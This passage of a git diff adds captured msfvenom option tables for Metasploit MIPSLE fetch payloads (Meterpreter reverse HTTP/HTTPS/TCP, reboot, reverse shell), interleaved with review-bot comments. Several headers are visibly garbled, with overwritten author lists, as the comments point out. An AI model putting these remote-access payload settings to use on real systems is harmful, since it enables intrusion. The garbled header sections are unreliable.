storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..edeffb6 
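Review bot: The captured header in this hunk is corrupted: "Rank: Norm" is truncated, the "Provided by:" label is missing, and an "Evasion options for payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp:" title with its "=====" underline sits where the contributor list should start, with only "juan vazquez" and "tkmru" surviving beneath it. This looks like two sections of the same msfvenom run being written over each other; regenerate this file and check that the capture script writes sections sequentially rather than interleaving them. The advanced table after the Description again has no title line, and FETCH_FILENAME ("JeVONKbzGYE") is a randomized default.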
--- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_http.txt 
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsle/meterpreter_reverse_http: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZKymOKKQKH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..54c980b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_https.txt 
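Review bot: Same corruption pattern as the reverse_tcp stager file: "Provided by:" is empty, the "Evasion options for ...:" title is misplaced, and the contributor list collapses to the dangling fragment "k@rapid7.com>" plus "timwr", i.e. the tail of an email address whose name was overwritten. Regenerate rather than hand-fix, since the HttpUserAgent default ("Mozilla/5.0 (Macintosh; ... Safari/605.1.15") and FETCH_FILENAME ("ZKymOKKQKH") are randomized per run and will change on the next capture anyway. The HttpUnknownRequestResponse default ("It works!") also appears broken across several lines here, so confirm the capture writes each option's value on its own row verbatim.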
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/mipsle/meterpreter_reverse_https: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aGcQVAEyngN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..9203588 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_tcp.txt 
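Review bot: Same misplaced "Evasion options" title and truncated author fragment ("rapid7.com>" after a stray "B") as the previous file; regenerate it with the others. Two defaults in this table deserve a pointer in whatever README accompanies these files, because readers will rely on them as reference: FETCH_CHECK_CERT is "false" (the curl/wget fetch accepts any server certificate) and StagerVerifySSLCert is "false" (Meterpreter does not verify the handler certificate), so neither leg of this HTTPS payload authenticates the server unless both are changed. The randomized HttpUserAgent and FETCH_FILENAME ("aGcQVAEyngN") defaults, by contrast, carry no information worth committing.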
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HuksXSRdq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-reboot.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-reboot.txt new file mode 100644 index 0000000..6d1f2ea --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-reboot.txt 
@@ -0,0 +1,73 @@ + + Name: HTTPS Fetch, Linux Reboot + Module: payload/cmd/linux/https/mipsle/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TdkqgYbz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-shell-reverse_tcp.txt new file mode 100644 index 0000000..b99f3e3 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-https-mipsle-shell-reverse_tcp.txt 
@@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SUoSCWLEc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_bind_tcp.txt new file mode 100644 index 0000000..7f33004 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_bind_tcp.txt 
